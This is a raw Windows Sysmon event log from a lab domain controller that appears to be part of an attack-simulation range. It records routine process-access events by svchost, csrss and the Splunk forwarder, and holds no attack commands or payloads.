13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.948{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4299-6000-4A00-000000009A01}3740C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4299-6000-4A00-000000009A01}3740C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}3696C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3696C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4299-6000-4800-000000009A01}25962512C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{00000000-0000-0000-0000-000000000000}3696C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.938{08A6967A-4299-6000-4900-000000009A01}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4299-6000-4800-000000009A01}2596C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.931{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 